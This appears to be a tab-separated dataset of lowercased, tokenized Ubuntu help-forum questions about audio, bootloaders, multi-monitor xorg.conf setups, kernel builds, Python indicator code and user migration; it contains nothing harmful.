30389	removing pulseaudio , about alsamixer	i removed pulseaudio today because rosetta stone had conflicts identifying the microphone which kinda makes it useless to me to learn a new language . thing is , alsamixer seems to have screwed up so i 'm not really familiar on which configuration file i have to tweak to make the whole system use alsamixer ( actually it does ... but the problem is this error ) $ alsamixer alsa lib pulse.c:229 : ( pulse_connect ) pulseaudio : unable to connect : connection refused can not open mixer : connection refused could anyone enlighten me on which configuration file i have to change ?
30390	internet monitoring & control tools	does anybody know a software for monitoring internet usage and control bandwidth speed and quotas for each user/mac in a centralized server for a small lan network ( less than 100 pcs ) .
30393	grub installation and dell recovery partition	i 'd like to install ubuntu 10.04 on a brand new dell vostro v130 . dell notebooks usually come with a recovery partition , which allows you to restore the original windows configuration of the notebook . the question is : will installing grub in the master boot record overwrite the address of this partition , making it useless ?
30396	error mounting virtualbox shared folders in an ubuntu guest	i have ubuntu 10 as the guest os on a windows 7 machine . i have been trying to setup shares through virtualbox , but nothing is working . first , i create the share in virtualbox and point it to a windows folder . then i try to mount the drive in linux , but i keep getting /sbin/mount.vboxsf : mounting failed with the error : protocol error i have read so many solutions to this , but none seem to work . i have tried : using the mount.vboxsf syntax reinstalling vbox additions rebooting enabling and trying as root account i made a share called `` test '' in vbox shared folders . then i made a directory in ubuntu named `` test2 '' . then i tried to execute this command : sudo mount -t vboxsf test /mnt/test2 any other ideas ?
30398	what program should i use to convert a cda file to mp3 ?	i am about to receive a cda audio file from someone who does not know anything about computers but uses audio cleanic for windows . i would like to convert it into an mp3 . what software do you recommend for this ? is gnome soundconverter for instance able to achieve it ?
30399	script to move pictures	how can i write a script that will move all .png .svg .gif files from /home/eric/desktop to /usr/share/icons ?
30400	recommend regular expression plugin for gedit ?	i would like to do some search and/or replace using regular expression in gedit . if i am correct , by default it is impossible to do this . so i was wondering if someone can recommend some nice plugin for this feature ? how to install such plugin ? thanks and regards !
30406	powermac g4 no console and/or crash on boot	i found an old g4 powermac ( silver 2002 afaict , 933mhz cpu with 256mb pc133 ram ) the other day and decided to use it as a server . i 've done all this many times before on pc hardware , though never on mac hardware . i managed to install ubuntu server 10.04 , wiping the existing osx install . it all installed , rebooted , after the yaboot prompts it flashed black text on white background , then the monitor went dead : i could not access the console . but i could ssh into it over the network , so i installed and configured the services i wanted . however this morning i had to move the machine ( only a few metres , so using the same cables and ports ) , so i ssh 'd in and sudo halt , unplugged , replugged and now i ca n't even get ssh access ( connection refused ; ping works ) . the monitor was doing the same thing as previously . the plan was to make it headless later , but it still had the monitor plugged in . ( removing the video card and it does n't boot at all ) i 've tried a few things at the boot : prompt : linux video=ofonly and linux video=nvidiafb but there 's no difference . other google searches are fruitless . the `` apple hardware test '' image found no problems . i 'm not sure if the video problem is stopping sshd from starting , or something else . other ideas ? thanks
30407	questions about using regex search & replace in gedit	i am trying to use regex search & replace plugin of gedit . i want to search a digit that repeats 2 or 3 times , so i thought the regex was [ 0-9 ] \ { 2,3\ } but it does n't match the target it should such as `` 22 '' . i want to find a word `` notes '' exactly , so i thought it would be \ < note\ > but it does n't work either . how to add a `` # '' in front of a string of any three digits '' [ 0-9 ] [ 0-9 ] [ 0-9 ] '' ? e.g . `` 123 '' becomes `` # 123 '' . i was wondering if i made some mistake ? i am using basic regex . what type of regex is used in the plugin ? could you provide a link for me to be familiar with it ? thanks and regards !
30408	desktop wallpaper wo n't display images , only colours and gradients	on my ubuntu 10.10 laptop , i 've recently noticed ( i 'm a busy guy and do n't focus on my minimalist wallpaper ) that my wallpaper has disappeared and been replaced with a coloured background - annoyingly similar to the image i had before , which means i have no idea when it changed . i 've tried different image types , sizes , and filesizes , but i ca n't get any images to load - not even the defaults . i also have no idea how to debug this . any help would be much obliged !
30410	raid 10 not being found by installer	i had ubuntu installed with raid 0 enabled . i have added 2 more disks went into the bios deleted and created a new raid setup using raid 10 ( total of 4 disks now ) . however during install of ubuntu server it asks if it should activate the raid sata disks , i tell it yes . next step shows up blank for available disks when determining where to mount the root etc . anyone have a clue as to why this would be ?
30412	3 monitors with 2 video cards not working	i 'm trying to get ubuntu working w/ 3 monitors . i have been given 2 video cards lspci | grep vga 20:01:00.0 vga compatible controller : ati technologies inc rv620 le [ radeon hd 3450 ] 25:05:00.0 vga compatible controller : nvidia corporation nv44a [ geforce 6200 ] ( rev a1 ) i have two monitors plugged into my ati card which is plugged into my primary pcie slot , and one monitor plugged into my nvidia card i have had it working correctly w/ two monitors ( dvi|vga ) plugged into the ati card and the nvidia monitor blank . now i have the nvidia monitor working ( dvi ) and one monitor from the ati ( vga ) working , but i ca n't seem to get the last monitor on the ati ( dvi ) to show anything . both monitors plugged into the ati cards show the boot screen , while the nvidia monitor is blank , and work up until the point you are presented w/ the login screen for ubuntu , then the dvi monitor on the ati card goes blank and the nvidia monitor turns on and works . so now i have two screens working , one on each card . at first glance , it appears that my setup `` wants '' to work - looking how the wallpaper is rendered . my left screen is only half covered in wallpaper , while my middle monitor is fully covered , and it looks like the missing quarter of my wallpaper should render on the left half of my 3rd monitor on the right ... .not sure if that actually means anything . kinda like this , where x = wallpaper 1 2 3 [ x ] [ xx ] [ x ] currently i 'm seeing this error in my xorg.0.log file , but i 'm not sure where to go from here : [ 24.746 ] ( ee ) radeon ( 2 ) : reusing fd for second head might i have something wrong w/ my xorg.conf or do i need to do something more to get this to work ? /etc/x11/xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 270.29 ( buildmeister @ swio-display-x86-rhel47-02.nvid section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 screen `` screen1 '' rightof `` screen0 '' screen `` screen2 '' rightof `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` module '' load `` dbe '' # double-buffering load `` glcore '' # opengl support # load `` dri '' # direct rednering infrastructure load `` glx '' # opengl x protocol interface load `` extmod '' # misc . required extensions # load `` v4l '' # video4linux load `` record '' # x event recorder load `` freetype '' # truetype font handler load `` type1 '' # adobe type 1 font handler endsection section `` serverflags '' option `` xinerama '' `` true '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` dell0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' identifier `` dell1 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsectisection `` monitor '' identifier `` dell2 '' vendorname `` unknown '' modelname `` unknown '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` rd3450 '' driver `` radeon '' busid `` pci:01:00:0 '' screen 0 endsection section `` device '' identifier `` rd34501 '' driver `` radeon '' busid `` pci:01:00:0 '' screen 1 endsection section `` device '' identifier `` gf6200 '' driver `` nvidia '' vendorname `` nvidia corporation '' busid `` pci:05:00:0 '' endsection section `` screen '' identifier `` screen0 '' device `` gf6200 '' monitor `` dell0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` rd3450 '' monitor `` dell1 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` rd34501 '' monitor `` dell2 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` dri '' mode 0666 endsection
30413	ubuntu one bookmark sync not working	has anyone been able to get ubuntu one bookmark sync to work in 10.10 , or should i just give up on it ?
30415	install on acer aspire one d255e	when i try to install via usb all i see is a cursor at the top of the screen after a brief flash that show linux being initialized . the system just hangs . this happened when i tried lubuntu as well . any ideas how to install on my brick ?
30417	video driver for an acer 5253	i installed 10.10 on an acer 5253-bz684 . the dimensions are not optimal and i can not change the generic unknown setting created during the install . what do i do ?
30428	problems with maverick upgrade	i upgraded to maverick 10.10 from lucid . i have an old toshiba satellite with a 1.1 mhz and 256mb ram . initially i could n't get my wireless to work . that solved itself after installing various updates and programs . the problems that remain are : i have to authorize at least 2 times at start-up . this machine is ubuntu only . no boot load screen . i have a ton of programs and system directories that are in my home folder . is this normal ? it is difficult to wake the computer from sleep . usually i just shut it down and restart . tonight i waited and got a message about corrupt memory . the computer takes forever to do just about everything . slow to start programs or doing things on the web . i am a longtime mac user ( since 1986 ) . i also manage a network of several windows machines . i am definitely a gui guy and do very little in the terminal so i really need to know where to begin to get things straightened out . can i rescue this machine without wiping it and doing a fresh install ? this is basically a hobby machine . aside from all the programs and upgrades i 've installed , i have almost no files or documents to worry about saving . anyone have any ideas about the problems i 'm having and the best way to proceed ?
30430	autohide for `` unity bar '' and panel ?	i like to have my system revert to a plain , empty desktop when no windows are open ... does the current version of unity have a setting to enable autohide ? moreover , where are all of the unity settings in general ?
30431	updating results in an hplip-data package error	i am using ubuntu 10.04 . i got an error when using update-manager to update .
30444	can i install natty alongside maverick and retain my encrypted /home partition ?	this is my partitioning scheme : 10gb partition empty -- will be installing natty here 10gb partition containing maverick 2gb swap partition 300gb encrypted /home partition i 've had few problems in the past with having two ubuntu installs on two separate partitions , giving /home it 's own partition , but i 'm a little concerned since i 'm now using an encrypted /home partition . install wo n't try to wipe my /home if i click `` encrypt home directory , '' will it ?
30449	replace string in bash script	i tried the following command in my script : find=grep `` $ jasper '' jasperreports.properties | awk -f '' reports/ '' ' { print $ 2 } ' example output : maps i want to change this output to something else , e.g . charts . for that , i tried : sed -i / '' $ find '' /charts sed is causing me problems , it needs an input file but i do n't have one . is there a way to pipe the output from grep and awk to sed ?
30456	building own kernel on ubuntu	i 'm trying to build my own kernel , as i want to write a kernel program which i need to compile into the kernel . so what did i do ? download from kernel.org , extract , do the make menuconfig and configure everything as needed , do a make , do a make modules_install , do a make install and finally do a update-grub . result : it does n't boot at all ... . now i had a look here and it describes a different way of compiling a kernel . could this be the reason whz my way did not work ? or does anyone else have an idea why my kernel does n't work ? # # # # # # # # edit great answer , ty . oli . but i tried it the old fashioned way , and after one hour of compiling i got this message : install -p -o root -g root -m 644 ./debian/templates.master /usr/src/linux-2.6.37.3/debian/linux-image-2.6.37.3meinsmeins/debian/templates dpkg-gencontrol -darchitecture=i386 -isp \ -plinux-image-2.6.37.3meinsmeins -p/usr/src/linux-2.6.37.3/debian/linux-image-2.6.37.3meinsmeins/ dpkg-gencontrol : error : package linux-image-2.6.37.3meinsmeins not in control info make [ 2 ] : *** [ debian/stamp/binary/linux-image-2.6.37.3meinsmeins ] error 255 make [ 2 ] : leaving directory `/usr/src/linux-2.6.37.3' make [ 1 ] : *** [ debian/stamp/binary/pre-linux-image-2.6.37.3meinsmeins ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-2.6.37.3' make : *** [ kernel-image ] error 2
30458	custom libindicator icon is not displayed	i want to change the statusicon of my own little reminder program . currently i am using gtk.statusicon but i want to use a applicationindicator . therefore i created an own icon and moved it to : /usr/share/icons/ubuntu-mono-dark/status/22 it is named indicator-notify.svg heres the code for the icon . ind = appindicator.indicator ( `` notify '' , `` indicator-notify '' , appindicator.category_application_status ) ind.set_status ( appindicator.status_active ) this icon is not displayed . although every other icon from this folder is . what did i miss ? is there maybe the need to `` register '' the icon in gtk ?
30460	which partition to install boot loader on ?	i am about to install ubuntu 10.10 on my windows 7 system i will be dual booting with windows 7 and want to use windows 7 as my default os for now . where should i put the boot loader/grub , on the windows partition or the root partition of ubuntu ? i have read elsewhere that windows 7 tends to corrupt grub2 . also , is there a way to use windows 7 's boot loader instead of selecting the os from grub ? i do n't know much about boot loaders
30461	nokia n73 unable to connect to laptop	i am connecting my nokia n73 through data cable with my laptop which has windows 7 and ubuntu . if i connect using windows , it gets connected and i can browse all the files and folders in my phone from the computer . if i connect from ubuntu then its not getting connected , so and i am unable browse the internet or files on my phone . any support would be great help for me .
30465	high cpu usage due to network manager	this really puzzled me . i noticed ă 30 % of avahi daemon on kubuntu 10.10 on a lenovo t410 ( this is the value given by top , not by the task manager of krunner ) . this was far too high . trying to supress plasmoid one by one i managed to narrow down the cpu usage to the system tray . then i did a few more test and actually everything is just until is open the network manager in the system tray and log to my wired connection . so it seems that asking kubuntu to use a wired connection make the avahi daemon using 30 % of the cpu . turning it down does n't make it down afterward . do you knwo what could cause this problem ? anyone else realised that ? edit : after a few more test i can confirm this is really a problem due to wired connection , it does n't do that with a wireless connection . edit # 2 : i checked from home . this is not a problem with every eth0 connection . at home where dhcp works i do n't see the boost in cpu usage . it 's only from work , where i add to manualy enter the ip adress gateway et al . also removing the internet cable drop the cpu usage down . very strange .
30466	how can i display keyboard shortcuts as i press them ?	i 'm going to be giving a short `` talk '' about efficient note taking with lyx . as such it 'll be important to focus on keyboard shortcuts . since people ca n't see me type , however , i want a tool that displays keyboard combinations as i press them , like this : i 'm sure i 've read about something like this on omg ubuntu ! , but my google-fu is weak . ideas ?
30467	indicator applet - appmenu - crashes on startup	basically , every time i log in , indicator appmenu crashes and needs to be reloaded . is there any way to avoid this ?
30469	how to install windows wireless driver ?	i have installed ndistgk package in ubuntu 10.10. now i want to install windows wireless driver so where i can get windows.inf file ?
30471	how restore /var/lib/mysql after i delete it ?	how restore /var/lib/mysql ( ubuntu 10.04 ) after i delete it ? history : delete /var/lib/mysql folder paste new /var/lib/mysql folder with wrong files delete again /var/lib/mysql folder clean + reinstall mysql result after reinstall : /var/lib/mysql folder not exist thanks , yosef
30476	kde 4.6.1 on ubuntu	this is what i have done . i added kubuntu backport ppa for ubuntu 10.10 . after i installed the kde-standard package . i then tried to login using kde plasma workspace from xsession . the problem is that when kde starts and i can only see my old gnome desktop . but i am sure kde is running gnome , alt+f2 gives me the kde 's desktop search but the rest of the apps are defaulted to gnome . then i tried installing the whole kubuntu-desktop package . but the same problem continues . how can i resolve this issue , any ideas ?
30482	is there an apt command to download a deb file from the repositories to the current directory ?	i am often interested in the installation triggers ( postinst , postrm ) or certain parts of packages ( like /usr/share and /etc ) . currently , i am running the next command to retrieve the source code : apt-get source [ package-name ] the downside is , this file is often much bigger than the binary package and does not reflect the installation tree . right now , i am downloading the packages through http : //packages.ubuntu.com/ : search for [ package-name ] select the package click on amd64/i386 for download download the actual file this takes too long for me and as someone who really likes the shell , i would like to do something like the next ( imaginary ) command : apt-get get-deb-file [ package-name ] i could not find something like this in the apt-get manual page . the most close i found was the -- download-only switch , but this puts the package in /var/cache/apt/archives ( which requires root permissions ) and not in the current directory .
30483	how do i start `` ubuntu classic desktop '' ( no effects ) from the command line	i am able to run sessions over an ssh connection but i rather use the `` ubuntu classic desktop ( no effects ) '' version on ubuntu 11.04 instead of the new unity since i do n't have 3d support on the laptop i 'm using to display the graphical user interface . how can i startup the older gnome-session without the 3d effects ? i tried gnome-session but it seems to be the option with the 3d effects and i want a more stripped down session over my ssh session .
30491	is there any way to make sure that any file created in a specific folder has a certain group as owner ?	i know that you can set a directory up so specific groups have access to it , but is there any way to set it up so that any new files created in it automatically have a specific group as the group owner , regardless of who they are created by ?
30492	when your web server starts paging memory to disk and slows to a crawl , what 's the best way to recover ?	i 've been shutting down and restarting the server , but is there something short of that you can do to quickly recover from a high-paging situation ?
30494	is there a non-web based application for calling in gtalk ?	is there a option to do this without having to use it in browser but also have ability to call , not only chat ?
30496	how to add a pygtk widget to the glade palette ?	say i 've created a gtk widget like this : class awesometextview ( gtk.textview ) : def set_font ( self , font_description ) : self.modify_font ( pango.fontdescription ( font_description ) ) how can i add my new widget to the palette in the glade interface builder ?
30503	download just one file from a package	i want one file from a built package that i do n't have ( and do n't particularly want to download ) . is there a service ( launchpad/packages.ubuntu.com/etc ) where i can just go in and download the file i want ? the context for this is this question where i want the latest /boot/config-* file from the latest available kernel package . the packages are quite large so i 'd rather just download the comparatively tiny config file and build the kernel myself ( i hack it around and customise it ) . this may easily result in a `` no , you ca n't do that '' but i wanted to test the water .
30509	boot usb ubuntu image from ipad ?	i know that you can run ubuntu from a flash drive , booted from another machine . what i 'm wondering is whether it 's possible to boot such an image from an ipad ( jailbroken or otherwise ) . i know that apple does n't want you to use a usb drive , but i understand that it 's possible to attach a usb drive using the usb camera adapter .
30513	2nd instance of firefox does not obey gtk2 customizations	on ubuntu 10.10 i started a 2nd instance of firefox using the command : $ firefox -profilemanager -no-remote & created a new profile and everything works smoothly except for the fact that this instance of ff does not obey by gtk2 customizations that i have placed in ~/.gtkrc-2.0 moreover , only some of the customizations are not obeyed . for example , the vertical scrollbars are supposed to be on the left , but they are on the right . the scrollbar arrows are together ( mac-like ) as specified , so is the scrollbar width . the first instance obeys all customizations with scrollbars on the left . any ideas ?
30514	why does my messaging menu code not work when split into functions ?	below are two python programs . they 're exactly the same , except for one is split into two functions . however only the one that 's split into two functions does n't work - the second function does n't work . why would this be ? note the code is taken from this useful blog post . without functions ( works ) : import gtk def show_window_function ( x , y ) : print x print y # get the indicate module , which does all the work import indicate # create a server item mm = indicate.indicate_server_ref_default ( ) # if someone clicks your server item in the mm , fire the server-display signal mm.connect ( `` server-display '' , show_window_function ) # set the type of messages that your item uses . it 's not at all clear which types # you 're allowed to use , here . mm.set_type ( `` message.im '' ) # you must specify a .desktop file : this is where the mm gets the name of your # app from . mm.set_desktop_file ( `` /usr/share/applications/nautilus.desktop '' ) # show the item in the mm . mm.show ( ) # create a source item mm_source = indicate.indicator ( ) # again , it 's not clear which subtypes you are allowed to use here . mm_source.set_property ( `` subtype '' , `` im '' ) # `` sender '' is the text that appears in the source item in the mm mm_source.set_property ( `` sender '' , `` unread '' ) # if someone clicks this source item in the mm , fire the user-display signal mm_source.connect ( `` user-display '' , show_window_function ) # light up the messaging menu so that people know something has changed mm_source.set_property ( `` draw-attention '' , `` true '' ) # set the count of messages in this source . mm_source.set_property ( `` count '' , `` 15 '' ) # if you prefer , you can set the time of the last message from this source , # rather than the count . ( you ca n't set both . ) this means that instead of a # message count , the mm will show `` 2m '' or similar for the time since this # message arrived . # mm_source.set_property_time ( `` time '' , time.time ( ) ) mm_source.show ( ) gtk.mainloop ( ) with functions ( second function is executed but does n't actually work ) : import gtk def show_window_function ( x , y ) : print x print y # get the indicate module , which does all the work import indicate def function1 ( ) : # create a server item mm = indicate.indicate_server_ref_default ( ) # if someone clicks your server item in the mm , fire the server-display signal mm.connect ( `` server-display '' , show_window_function ) # set the type of messages that your item uses . it 's not at all clear which types # you 're allowed to use , here . mm.set_type ( `` message.im '' ) # you must specify a .desktop file : this is where the mm gets the name of your # app from . mm.set_desktop_file ( `` /usr/share/applications/nautilus.desktop '' ) # show the item in the mm . mm.show ( ) def function2 ( ) : # create a source item mm_source = indicate.indicator ( ) # again , it 's not clear which subtypes you are allowed to use here . mm_source.set_property ( `` subtype '' , `` im '' ) # `` sender '' is the text that appears in the source item in the mm mm_source.set_property ( `` sender '' , `` unread '' ) # if someone clicks this source item in the mm , fire the user-display signal mm_source.connect ( `` user-display '' , show_window_function ) # light up the messaging menu so that people know something has changed mm_source.set_property ( `` draw-attention '' , `` true '' ) # set the count of messages in this source . mm_source.set_property ( `` count '' , `` 15 '' ) # if you prefer , you can set the time of the last message from this source , # rather than the count . ( you ca n't set both . ) this means that instead of a # message count , the mm will show `` 2m '' or similar for the time since this # message arrived . # mm_source.set_property_time ( `` time '' , time.time ( ) ) mm_source.show ( ) function1 ( ) function2 ( ) gtk.mainloop ( )
30520	list theme for pidgin ?	i would like to give pidgin a try , but i do n't like the default theme for the list , there is too much space between the contacts , i would like to style it in a more minimal way so i can see more contacts in less space . despite my ( not so thorough searches ) i did n't find any theme specically for my list , i found for the icons and the sounds ... any proposals ?
30523	program to hide/show given window with hotkey ?	i 'm fairly sure this program exists , but i do n't remember what it was called . there are a few drop-down terminal programs ( guake , yakuke , tilde ) , and i 've been a fan of guake for a while . however , since i discovered gnu screen i 've been more interested in using eterm . but i would like to make it dropdown/hide on keypress , similar to the way guake does . i remember at some point that someone mentioned a program that allowed you to do similar things with basically any other window . unfortunately my time spent googling around for terms like `` show/hide any terminal ubuntu '' have been met with stupid windows search engine spam . any clue where i could find the program i 'm looking for ? thanks !
30532	teminal non-responsive on load , ca n't enter anything until ctrl+c	i have an issue with terminal in ubuntu 10.04 . when i launch it , it hangs , like this : i can not do anything until i press ctrl + c : i can not remember when this started . what can be wrong ? looks like teminal is loading or processing something each time it loads . how can i diagnose and solve this problem ? edit : here are the conents of ~/.bashrc : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi # source .profile if [ -f ~/.profile ] ; then . ~/.profile fi setting -x at the beginning showed me that it tries to repeat this without stopping : +++++++++++++++++++ ' [ ' 'complete -f -x '\ '' ! * . @ ( pdf|pdf ) '\ '' acroread gpdf xpdf ' ' ! = ' 'complete -f -x '\ '' ! * . @ ( pdf|pdf ) '\ '' acroread gpdf xpdf ' ' ] ' +++++++++++++++++++ line='complete -f -x '\ '' ! * . @ ( pdf|pdf ) '\ '' acroread gpdf xpdf' +++++++++++++++++++ line='complete -f -x '\ '' ! * . @ ( pdf|pdf ) '\ '' acroread gpdf xpdf' +++++++++++++++++++ line= ' acroread gpdf xpdf' +++++++++++++++++++ list= ( `` $ { list [ @ ] } '' $ line ) +++++++++++++++++++ read line
30535	shutdown computer with the remote controller	how can i shutdown the computer with the ir controller ? it has many working buttons , which can be used correctly , but the power button does n't do anything . is there a way to program a script to a button ? remote controller works with lirc under xmbc on ubuntu 10.04 .
30539	what causes critical glib errors ( when coding using messaging menu ) ?	if i run the python code below ( almost entirely from this useful blog post ) then i get three identical nasty looking error messages in the terminal . what might be causing them ? i note the number ( 5857 in the example below ) changes slightly on each run . what does this number signify ? is it a memory location or something similar ? ( messaging-menu.py:5857 ) : glib-gio-critical ** : g_dbus_method_invocation_return_dbus_error : assertion `error_name ! = null & & g_dbus_is_name ( error_name ) ' failed ( messaging-menu.py:5857 ) : glib-gio-critical ** : g_dbus_method_invocation_return_dbus_error : assertion `error_name ! = null & & g_dbus_is_name ( error_name ) ' failed ( messaging-menu.py:5857 ) : glib-gio-critical ** : g_dbus_method_invocation_return_dbus_error : assertion `error_name ! = null & & g_dbus_is_name ( error_name ) ' failed i 'm running this on natty , i should probably find out if i get the same errors in 10.10 though ... import gtk def show_window_function ( x , y ) : print x print y # get the indicate module , which does all the work import indicate # create a server item mm = indicate.indicate_server_ref_default ( ) # if someone clicks your server item in the mm , fire the server-display signal mm.connect ( `` server-display '' , show_window_function ) # set the type of messages that your item uses . it 's not at all clear which types # you 're allowed to use , here . mm.set_type ( `` message.im '' ) # you must specify a .desktop file : this is where the mm gets the name of your # app from . mm.set_desktop_file ( `` /usr/share/applications/nautilus.desktop '' ) # show the item in the mm . mm.show ( ) # create a source item mm_source = indicate.indicator ( ) # again , it 's not clear which subtypes you are allowed to use here . mm_source.set_property ( `` subtype '' , `` im '' ) # `` sender '' is the text that appears in the source item in the mm mm_source.set_property ( `` sender '' , `` unread '' ) # if someone clicks this source item in the mm , fire the user-display signal mm_source.connect ( `` user-display '' , show_window_function ) # light up the messaging menu so that people know something has changed mm_source.set_property ( `` draw-attention '' , `` true '' ) # set the count of messages in this source . mm_source.set_property ( `` count '' , `` 15 '' ) # if you prefer , you can set the time of the last message from this source , # rather than the count . ( you ca n't set both . ) this means that instead of a # message count , the mm will show `` 2m '' or similar for the time since this # message arrived . # mm_source.set_property_time ( `` time '' , time.time ( ) ) mm_source.show ( ) gtk.main ( )
30540	banshee and heat rising to shutoff	when i run banshee why would the temp rise so much that it will shut off the laptop . toshiba l300d amd dual core . this happens only when running banshee .
30542	how to create a personal vm server	i have a personal ubuntu server at home for my various personal development needs . i often spend time to configure it for various purposes e.g . for serving a blog or my mercurial repositories etc . however , i am getting very interested in pre-packaged linux appliances available e.g . turnkey linux etc . it takes no effort to get an appliance up and running ! i was wondering if i could make my home server into vm server , where i can run multiple vms for various needs . the server does not have a screen , hence i would like to be able to manage my vms from the web or console i guess in short , i am asking if its possible to have my own personal , light weight amazon ec2 . if yes , how can i set it up ? is there an ubuntu derived distro available for this ? or can i install a couple of packages and get this running ?
30546	what is namoroka , and should i have it instead of minefield or firefox 4 ?	can someone please clear up what the difference between namoroka , minefield , and firefox 4 is ? which one will eventually `` win out , '' and which one should i have installed ? my 10.10 install came with namoroka , and it 's fast so i like it .
30548	updating vim causes usb mouse to freeze	i wanted syntax highlighting in vim . i read in some forum that i should do : sudo apt-get install vim i guess there were a lot of dependencies , so it took a while . i typed `` yes '' a few times without really reading the prompts . my computer restarted and now my mouse & internet do n't work . i suspect something got messed up in gnome . i should mention that things were working perfectly before i ran the command to update vim ( namely , my mouse and internet were working ) . how to fix ? i believe i 'm using 8.04 . *edit : more info * cat /etc/issue = ubuntu 8.04.4 lts \n \l /var/log/messages is empty . cat /var/log/xorg.0.log | grep ee = ( ee ) module abi major version ( 7 ) does n't match the server 's version ( 2 ) ( ee ) failed to load module `` mouse '' ( module requirement mismatch , 0 ) ( ee ) fglrx ( 0 ) : atiddxdriscreeninit failed , gps not initialized . ( ee ) no input driver matching 'mouse' edit : attempt 1 i tried the following ( as mentioned here ) : $ sudo update-rc.d -f gdm remove # get rid of the old boot symlinks $ sudo update-rc.d gdm defaults 25 # add the new ones with a higher priority i restarted and got an irq 19 nobody cared error .
30553	boot with irqpoll	i 'm getting an irq 19 error nobody cared . google tells me to boot with irqpoll , but i 'm not sure how to do this . i 'm on ubuntu 8.04.4 lts .
30556	backup systems config files	i 'm planning on installing nvidia proprietary drivers on my ubuntu 10.10 . historically this always ends-up with me being left with no graphical interface . no ability to revert - and reinstalling the whole system . so now , before trying this anew , i wish to backup all relevant config files . i 'll try 1 or 2 methods . i 'll list each one 's commands . i 'll appreciate if anyone can tell me how to backup the relevant file , or what 's the reverse of this operation . 10x , david method i - as described here : apt-get -- purge remove xserver-xorg-video-nouveau as described in this answer : edit /etc/default/grub and add the line grub_cmdline_linux= '' nouveau.modeset=0 '' sudo update-grub reboot install original drivers downloaded from nvidia site . method ii - as described here : sudo apt-get purge nvidia* [ possibly 'sudo gedit /etc/modprobe.d/blacklist.conf ' adding 'vga16fb ' 'nouveau' sudo apt-get install nvidia-glx-185 sudo modprobe nvidia sudo lsmod | grep -i nvidia sudo nvidia-xconfig
30558	script to migrate unix users and groups	i 'm migrating my ubuntu 8.10 server to 10.04 . is there any script to migrate users /etc/passwd and groups /etc/group along with password /etc/shadow from one server to another ?
